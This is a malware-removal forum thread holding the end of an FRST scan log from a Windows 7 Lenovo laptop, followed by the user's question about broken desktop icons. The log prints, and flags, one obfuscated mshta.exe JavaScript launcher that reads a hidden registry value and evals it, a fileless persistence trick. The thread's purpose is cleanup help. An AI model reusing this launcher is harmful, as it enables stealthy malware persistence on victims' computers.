Lenovo User Guide (HKLM-x32\...\{13F59938-C595-479C-B479-F171AB9AF64F}) (Version: 1.0.0008.00 - Lenovo)
Lenovo Warranty Information (HKLM-x32\...\{FD4EC278-C1B1-4496-99ED-C0BE1B0AA521}) (Version: 1.0.0005.00 - Lenovo)
Lenovo Welcome (HKLM-x32\...\Lenovo Welcome_is1) (Version: 2.02.003.0 - Lenovo)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
McAfee Agent (HKLM-x32\...\{EBF3D65F-011E-44D2-8F4F-C74B52682EDD}) (Version: 4.8.0.1500 - McAfee, Inc.)
McAfee VirusScan Enterprise (HKLM-x32\...\{CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF}) (Version: 8.8.06000 - McAfee, Inc.)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Message Center Plus (HKLM\...\{C2C2DB64-1BCE-4FA7-962D-457795ECCEC0}) (Version: 3.3.0004.00 - Lenovo Group Limited)
Metric Collection SDK (x32 Version: 1.1.0012.00 - Lenovo Group Limited) Hidden
Metric Collection SDK 35 (x32 Version: 1.2.0006.00 - Lenovo Group Limited) Hidden
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 49.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 49.0.2 (x86 en-US)) (Version: 49.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 49.0.2.6136 - Mozilla)
Mp3tag v2.71 (HKLM-x32\...\Mp3tag) (Version: v2.71 - Florian Heidenreich)
On Screen Display (HKLM\...\OnScreenDisplay) (Version: 6.73.01 - )
Potplayer-64 bit (HKLM\...\PotPlayer64) (Version:  - Kakao Corp.)
Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 6.68.10 - Lenovo Group Limited)
RapidBoot (HKLM\...\{5E2652DF-743F-482B-A593-C95F431A5769}) (Version: 1.10 - Lenovo)
Registry Patch to Enable Maximum Power Saving on WiFi Adapters for Windows 7 (HKLM\...\EnablePS) (Version: 1.00 - )
RICOH_Media_Driver_v2.13.18.02 (HKLM-x32\...\{FE041B02-234C-4AAA-9511-80DF6482A458}) (Version: 2.13.18.02 - RICOH)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
ThinkPad FullScreen Magnifier (HKLM\...\ThinkPad FullScreen Magnifier) (Version: 2.42 - )
ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.19.14 - )
ThinkPad UltraNav Utility (HKLM-x32\...\{17CBC505-D1AE-459D-B445-3D2000A85842}) (Version: 2.13.0 - Lenovo)
ThinkVantage Access Connections (HKLM-x32\...\{8E537894-A559-4D60-B3CB-F4485E3D24E3}) (Version: 6.26.81 - Lenovo)
ThinkVantage Active Protection System (HKLM\...\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}) (Version: 1.74 - Lenovo)
ThinkVantage Communications Utility (HKLM\...\{88C6A6D9-324C-46E8-BA87-563D14021442}_is1) (Version: 2.11.0.0 - Lenovo)
VIPAccess (HKLM-x32\...\{E8D46836-CD55-453C-A107-A59EC51CB8DC}) (Version: 2.0.1.91 - VeriSign)
Windows Driver Package - Intel (e1cexpress) Net  (12/21/2010 11.8.84.0) (HKLM\...\6D23A494E9A245843FB8584D9307D3E328DF8613) (Version: 12/21/2010 11.8.84.0 - Intel)
Windows Driver Package - Intel (MEIx64) System  (10/19/2010 7.0.0.1144) (HKLM\...\90FD26A77B849AE03FF5F07A1CDA7F950406A8D8) (Version: 10/19/2010 7.0.0.1144 - Intel)
Windows Driver Package - Intel System  (09/10/2010 9.2.0.1011) (HKLM\...\0CDBDD444A1F5FFEA227B4E7DCE195F11F08240A) (Version: 09/10/2010 9.2.0.1011 - Intel)
Windows Driver Package - Intel System  (09/10/2010 9.2.0.1011) (HKLM\...\A513FC5E5A08D4EF27F234E91E0E942A0234210B) (Version: 09/10/2010 9.2.0.1011 - Intel)
Windows Driver Package - Intel System  (10/04/2010 9.2.0.1015) (HKLM\...\FE1BEBFD475BB832AAF104F5C63348E98A9286DF) (Version: 10/04/2010 9.2.0.1015 - Intel)
Windows Driver Package - Intel USB  (09/16/2010 9.2.0.1013) (HKLM\...\D97688B8E3830BF9820E15EB8D9552DCBF988CFD) (Version: 09/16/2010 9.2.0.1013 - Intel)
Windows Driver Package - Lenovo 1.62.00.00 (01/19/2011 1.62.00.00) (HKLM\...\D01A7EE241898C810674C69EB908D655D149BE77) (Version: 01/19/2011 1.62.00.00 - Lenovo)
Windows Driver Package - Synaptics (SynTP) Mouse  (05/05/2011 15.3.6.0) (HKLM\...\C63C03BF3BE2B6F6204BB54541690449FFF79F4F) (Version: 05/05/2011 15.3.6.0 - Synaptics)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {03F4E4A8-6650-450E-B602-7D6032954BD8} - System32\Tasks\Lenovo\LSC\Lenovo Solution Center Notifications => C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe [2016-04-20] (Lenovo)
Task: {127E1244-6272-4841-9A8E-A3B0A1E08CD4} - System32\Tasks\Lenovo\Message Center Plus Launcher => C:\Program Files (x86)\Lenovo\message center plus\mcplaunch.exe [2014-09-13] (Lenovo)
Task: {3C77B26C-534F-4613-A1E0-9147FA029E6E} - System32\Tasks\Microsoft\Windows\PLA\LSC Memory => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "LSC Memory" "$(Arg0)"
Task: {41254CBE-BE8E-4EBE-AE49-C2E30CA9947E} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-04-20] (Lenovo)
Task: {440D6F89-2BAA-4EC9-9C9D-8A3AE544B210} - System32\Tasks\Lenovo\LSC\LSCTaskService => C:\Program Files\Lenovo\Lenovo Solution Center\App\LSCTaskService.exe
Task: {55FB8BD6-8C4C-4920-91B5-692D04045384} - System32\Tasks\PCDEventLauncher => C:\Program Files\PC-Doctor\sessionchecker.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {5EE08B5E-D6A7-4F92-904C-2E271853A892} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PwmIdTsv.exe [2016-04-14] (Lenovo Group Limited)
Task: {637CEB23-19E3-4FCF-B1D2-61109D529939} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {6DC323AF-E881-40DB-86B6-2688501CE555} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\Bootstrap.exe [2013-07-18] (Intel Corporation)
Task: {90C5AA67-EF23-490C-AFCE-431D19BC7B18} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)
Task: {90F0D108-CFF4-4F30-8C9C-5B59ACAA6575} - System32\Tasks\MCP => C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe [2014-09-13] (Lenovo)
Task: {938017A0-02C6-4DF7-AEB0-6D3BE6B25996} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {9D9EE676-C781-48C4-AF2D-307B6C83E669} - System32\Tasks\Lenovo\SROptimizer => C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\\SRORest.exe [2012-03-05] (Lenovo Group Limited)
Task: {9DD3046C-36ED-4E44-9BBE-C23AC588FAB8} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {A94CD08B-C77E-4067-99A1-5D6B5DFD53FB} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2-Logon => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\Bootstrap.exe [2013-07-18] (Intel Corporation)
Task: {B42F4A52-F3B1-4202-9829-30D4DEB32DF2} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSC.Services.UpdateStatusService.exe [2016-04-20] ()
Task: {B5C085DD-62CF-4F9B-863E-691BC8B15B81} - System32\Tasks\SystemToolsDailyTest => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {C34C57A6-1780-4938-AD2E-D5E2595F7A9E} - System32\Tasks\TVT\TVSUUpdateTask_UserLogOn => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [2016-09-10] ()
Task: {C7978D9E-39F9-4D04-A5F3-99917A5E71E9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {D497E88F-86B7-47D5-8BFD-58BB151D6E9A} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2015-07-08] (Lenovo)
Task: {DA927600-D95C-4BE2-86D4-0D34262FBA8E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-10-15] (Adobe Systems Incorporated)
Task: {EFF1F180-818C-44EE-99C3-35CE783B2461} - System32\Tasks\DiskUpdate => C:\SWTOOLS\OSFIXES\DISKUPDT\DiskUpdate.exe [2009-02-09] ()
Task: {F19D65BF-FFD7-488E-81FC-CBFD694B199D} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [2016-09-10] ()
Task: {F3DF85DF-DCFB-42F3-9E95-75B631729CA9} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program => C:\Program Files\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe
Task: {FB56393F-3829-44D5-97C4-9FA16D7AF324} - System32\Tasks\Lenovo\LSC\LSCHardwareScanPostpone => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-04-20] (Lenovo)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\PC-Doctor\uaclauncher.exeq-backgroundmon scripts\backgroundmon.xml
Task: C:\Windows\Tasks\SystemToolsDailyTest.job => C:\Program Files\PC-Doctor\uaclauncher.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2011-10-23 13:48 - 2016-04-14 06:08 - 00107008 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2011-10-23 13:43 - 2010-10-26 10:40 - 00049056 ____N () C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
2011-10-23 13:46 - 2016-03-02 00:52 - 00102904 _____ () C:\Windows\System32\IccLibDll_x64.dll
2016-10-15 16:06 - 2016-09-10 12:13 - 00028544 _____ () C:\Program Files (x86)\Lenovo\System Update\SUService.exe
2007-04-18 19:30 - 2007-04-18 19:30 - 00393216 _____ () C:\Program Files (x86)\McAfee\Common Framework\cryptocme2.dll
2007-04-18 19:30 - 2007-04-18 19:30 - 00471040 _____ () C:\Program Files (x86)\McAfee\Common Framework\ccme_base.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc: "C:\Windows\system32\mshta.exe" "javascript:YYgShx7="J";m2a9=new ActiveXObject("WScript.Shell");TyNMG7="sm";tvu2T=m2a9.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");gN8SL="9XM";eval(tvu2T);IQNZF98="ul9qNBej";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 16:34 - 2009-06-10 11:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Wayne\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{557FD2C9-2A62-466B-8816-BE633032D5CD}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{03DFB3DC-2095-4510-A567-0FD1AC84D38E}] => (Allow) LPort=2869
FirewallRules: [{939994F3-B029-408E-A45B-656D662258E5}] => (Allow) LPort=1900
FirewallRules: [{FB2FBBC5-CFB5-4C0D-9B9D-AB475DA6AB32}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{35BA6FB7-E803-42FD-B4E5-C83BAC48B6FC}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{272A8282-9BDC-4E20-B536-3C4E8B96312B}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
FirewallRules: [{05BDB8A8-4D5A-4E2D-A4F1-415929A64E19}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
FirewallRules: [{AC727E4B-2EA7-4F3F-BFF0-F79E00246AF9}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
FirewallRules: [{D4AD504C-892E-4438-BDE4-9DB67DD5B7BA}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
FirewallRules: [{CC021E9A-1E83-4E51-997E-170E3B0D0E7B}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
FirewallRules: [{11E3ABC0-8855-454E-AA19-D7473CD862E3}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
FirewallRules: [TCP Query User{F0458B1B-4AF2-4B5E-AC7E-5EC679054837}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [UDP Query User{7E53DAB9-4A4C-431A-AAAB-8AA0F88D2DE1}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [{30334865-C066-41CD-9C1F-8254C57A1B1B}] => (Block) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [{EEA64370-148F-4DA2-8044-A785490116B2}] => (Block) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [{E1757C0D-F532-4F82-AE9E-3D9E867F2A08}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe
FirewallRules: [{CD716B18-5F73-4411-8B74-236BD61D44C8}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe
FirewallRules: [{803C93D3-96A6-446E-8D23-23BCADB6445A}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe
FirewallRules: [{4CB06D72-5D6E-49DF-A836-79D73949BD90}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe
FirewallRules: [{EC124B96-498B-4861-908B-3C4D7DAC6F87}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{87242A7F-F3FA-4D44-B1C7-A56539FCF863}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C07E1440-D3D1-4BB5-BA8C-5D939796F63C}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{DAEDB0D2-9B07-4435-B2B8-F9470E3F1F5A}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{E363884B-A318-4E92-B78D-F56F23ECC504}] => (Allow) C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe
FirewallRules: [{3C9229B1-0649-4BBC-BDE6-E400F423E93A}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe
FirewallRules: [{B3A06D6F-A82C-457C-A2D5-CBF7B818DF20}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe
FirewallRules: [{275A5FF4-1C5D-4B8A-8691-4DF60A30A124}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

09-10-2016 22:13:22 Windows Update
09-10-2016 22:51:07 Windows Update
15-10-2016 15:29:16 Windows Update
15-10-2016 23:27:47 Restore Point Created by FRST
16-10-2016 00:44:12 Windows Update
18-10-2016 20:26:26 Restore Point Created by FRST
20-10-2016 21:52:50 Windows Update
20-10-2016 22:02:25 Windows Update

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (10/21/2016 09:12:42 PM) (Source: PC-Doctor) (EventID: 1) (User: )
Description: (8564) Asapi: (21:12:42:5440)(8564) S3LogPusherPlugin.Helper - Error -- 340 Unable to storage the test log to medium

Error: (10/21/2016 08:50:45 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (10/20/2016 11:03:35 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (10/20/2016 10:40:26 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (10/20/2016 10:09:19 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (10/20/2016 09:34:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CAMService.exe, version: 1.0.0.1, time stamp: 0x54077d08
Faulting module name: ntdll.dll, version: 6.1.7601.23543, time stamp: 0x57d2fde1
Exception code: 0xc0000005
Fault offset: 0x0000000000048d84
Faulting process id: 0x744
Faulting application start time: 0x01d22b6d77112805
Faulting application path: C:\Program Files\Intel\CAM\bin\CAMService.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: c1d54467-9760-11e6-928e-2477031f344c

Error: (10/20/2016 09:34:06 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (10/20/2016 09:12:38 PM) (Source: PC-Doctor) (EventID: 1) (User: )
Description: (6512) Asapi: (21:12:38:1300)(6512) S3LogPusherPlugin.Helper - Error -- 340 Unable to storage the test log to medium

Error: (10/20/2016 08:54:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CAMService.exe, version: 1.0.0.1, time stamp: 0x54077d08
Faulting module name: ntdll.dll, version: 6.1.7601.23543, time stamp: 0x57d2fde1
Exception code: 0xc0000005
Fault offset: 0x0000000000048d84
Faulting process id: 0x760
Faulting application start time: 0x01d22b67ec92b291
Faulting application path: C:\Program Files\Intel\CAM\bin\CAMService.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: 33deedad-975b-11e6-9a5e-2477031f344c

Error: (10/20/2016 08:54:23 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


System errors:
=============
Error: (10/21/2016 08:50:39 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom

Error: (10/21/2016 08:50:06 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Lenovo Platform Service service to connect.

Error: (10/20/2016 11:03:30 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom

Error: (10/20/2016 11:02:58 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Lenovo Platform Service service to connect.

Error: (10/20/2016 10:40:27 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom

Error: (10/20/2016 10:40:01 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Lenovo Platform Service service to connect.

Error: (10/20/2016 10:09:19 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom

Error: (10/20/2016 10:08:54 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Lenovo Platform Service service to connect.

Error: (10/20/2016 09:34:16 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The CAM Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (10/20/2016 09:34:06 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom


==================== Memory info ===========================

Processor: Intel® Core™ i5-2520M CPU @ 2.50GHz
Percentage of memory in use: 51%
Total physical RAM: 3979.23 MB
Available physical RAM: 1916.05 MB
Total Virtual: 7956.65 MB
Available Virtual: 5600.5 MB

==================== Drives ================================

Drive c: (Windows7_OS) (Fixed) (Total:287.15 GB) (Free:217.93 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive q: (Lenovo_Recovery) (Fixed) (Total:9.77 GB) (Free:1.54 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 8D14B1C3)
Partition 1: (Active) - (Size=1.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=287.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=9.8 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

 

 

Viruscan on-access scanner has not detected Powelike!lnk or Powelike!bat or any other problem.  i will reboot, recheck and report if anything is detected.

 

i noticed after doing the fixes in post 7 of this thread that the icons for most of the web shorcuts on my desktop are white icons instead of firefox icon (default browser) and there are two desktop.ini files. if i create new shortcuts the icons are also white.  tried deleting iconcache.db, changing default browser to IE and back to firefox but the icons do not reset.  is there a simple way to correct this?

 

thank you for your help Aura!



#10 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • OFFLINE
  •  
